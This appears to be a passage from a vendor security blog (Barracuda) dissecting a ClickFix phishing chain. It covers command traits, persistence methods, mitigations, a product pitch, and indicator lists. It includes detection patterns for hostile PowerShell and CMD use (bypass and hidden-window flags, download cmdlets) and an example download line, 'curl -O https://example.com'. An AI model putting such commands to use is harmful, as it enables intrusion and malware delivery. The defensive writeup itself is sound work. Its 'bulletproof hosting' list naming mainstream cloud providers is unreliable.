A technical breakdown of a ClickFix payload seen in the wild

Notes for technical teams on characteristics that are often found in these commands:

• Execution policy bypass to skip script execution warnings or any confirmation prompts from appearing. Look for: -ep bypass, -ExecutionPolicy Bypass, -ex b
• Obfuscated commands, including Backticks (for PowerShell) and quotations (for CMD). They are generally ignored by the terminal. Concatenation has also been observed.
• Execution chaining, typically involving CMD into PowerShell.
• Flags to ensure windows are hidden upon launch. For example, “-WindowStyle Hidden” in PowerShell, which can be abbreviated to as little as “-w h” or “headless” in the command prompt.
• Web requests, including but not limited to PowerShell “Invoke-Webrequest”, “iwr”, “DownloadString”, “Start-BitsTransfer”.
• Call to an external website. This appears as both hardcoded IP addresses or newly registered domains that are used as command-and-control servers or staging servers that are hosting malware.

Stage 4: Establishing persistence

Once the command is successfully executed, the activity can head in different ways depending on the attackers and their goals.

Our team created a quick and simple script that establishes persistence via WMI Event Subscriptions. This starts at 21:40 UTC — five minutes after the victim opened the phishing email. It runs as follows: a (for simulation purposes, harmless) schedule is set on a 60-second interval to create and append to a txt document. In a real incident, this script would likely contain a delivery mechanism that fetches the payload, enabling it to evade disk-based detection.

Popular methods of persistence include:

• Scheduled tasks: The payload creates a scheduled task that re-executes on user login or at set intervals with elevated privileges, often leveraging LOLBins (legitimate Windows utilities like powershell.exe, mshta.exe, rundll32.exe, or cmd.exe) to evade detection. These tasks persist through system restarts.
• Registry run keys: The payload adds a registry value under HKCUSoftwareMicrosoftWindowsCurrentVersionRun (or RunOnce for single execution). On user login, Windows automatically executes whatever is referenced in these keys.
• WMI event subscriptions: Using PowerShell, the attackers create a new task using the “Set-WmiInstance” cmdlet, defining when the task triggers and what the task is. This is a more elusive method of scheduling jobs compared to Scheduled Tasks, as they are more difficult to view, do not generate as many logs, and are often overlooked initially by incident response tools.

Stage 5: The attack unfolds — privilege escalation, data exfiltration, encryption, and more

Once the attackers have a reliable means of access to the network, they will try to gain privileged access to the environment. If they’re successful, they can progress their attack to include data exfiltration, destruction or encryption, and more — all enabled by the success of the initial access phishing email.

Practical steps to stay safe

To reduce risk exposure and mitigate the impact of an attack, organizations are advised to implement the following:

• Phishing-resistant MFA (like security keys). Hardware keys only work on legitimate websites, so attackers can’t trick users into logging in via fake pages and then stealing their sessions. Such keys include YubiKeys, which provide users with protection against proxy sites. YubiKeys use FIDO2/WebAuthn, a protocol that binds authentication to the specific domain the user is visiting.
• Lock down email authentication (through the industry standards of DMARC, SPF and DKIM). Domain-based Message Authentication, Reporting & Conformance (DMARC) is the overarching policy layer for tools that check if a sender’s IP is authorized to send on behalf of a domain and verify that the message wasn’t tampered with in transit. Properly configured DMARC helps block spoofed emails before they reach users.
• Train users to stop and verify unusual requests. Especially anything that asks them to paste commands, “fix” errors or urgently log in.
• Don’t rely on users spotting bad emails. AI-generated phishing looks realistic and error-free, so security tools must do more of the detection heavy lifting.
• Monitor for suspicious login sessions and behavior. AiTM attacks use stolen session tokens, so look for logins from unusual locations or devices or at irregular times for that user.
• Block or restrict risky system behaviors. Limit access to tools like PowerShell, clipboard access, and “Run” commands wherever possible to reduce ClickFix-style attacks.
• Watch for persistence tricks after compromise. Attackers often add inbox rules, scheduled tasks or background scripts to stay hidden after login.
• Use continuous, automated, intelligent layered security. No single control stops advanced, evasive email attack chains — you need visibility and mitigation capabilities at every stage of the attack lifecycle.

How Barracuda can help

Barracuda helps organizations defend against advanced email attacks by combining protection and cyber resilience across email, applications, data, and networks. For further information and product insight, see BarracudaONE, Barracuda Integrated Email Protection and Barracuda Managed XDR. Barracuda Managed XDR also offers Automated Threat Response (ATR) for email, accelerating real-time containment of threats at the inbox level.

Indicators of Compromise

Endpoint IOCs

All the following can be detected via 4688 logs (ensure command line auditing is enabled) or via most endpoint solutions.

• Hidden window flags: -w hidden, -w h, headless
• Obfuscated command lines: Backticks, concatenation, and base64 encoding
• Call to external webpages, often newly registered, accompanied by data transfer commands: curl -O https://example.com and DownloadString, iwr, WebClient
• WMI subscriptions: wmiprvse.exe spawning cmd or Powershell at regular intervals
• Suspicious process tree: Explorer.exe spawning cmd.exe or powershell.exe, clear indicator that the command was executed via the Run dialog box. Nested commands are common: Explorer.exe à cmd.exe à powershell.exe

Email IOCs

• Bulletproof hosting providers: VPNs are commonly associated with suspicious activity, but they are also widely used in legitimate enterprise environments worldwide, which makes them a noisy indicator on their own. A more telling trend Barracuda Managed XDR has been tracking is the rise of bulletproof hosting providers. These are used widely for malicious activity, and the list is likely to include DigitalOcean, PacketHub S.A., Clouvider Limited, ReliableSite LLC, DataCamp Limited, and more.
• Inbox rules: One of the most common post-exploitation actions observed in our SOC is the creation of malicious inbox rules. These are designed to silently filter, hide or redirect specific messages so the victim remains unaware that their account has been taken over.
  • Keyword-based filtering rules to automatically move, mark as read or delete any incoming message containing terms relating to the attack like hacked, suspicious, fraud, unauthorized, payment, invoice, etc.
  • Auto-forwarding rules that quietly send copies of messages matching financial keywords to an attacker-controlled external address.
  • Move-to-folder rules that relocate sensitive messages into rarely checked folders like RSS feeds, Conversation History and Archive.

Since these rules operate silently and persist even after password resets (unless explicitly removed), detecting and remediating malicious inbox rules is a critical step in any email compromise investigation.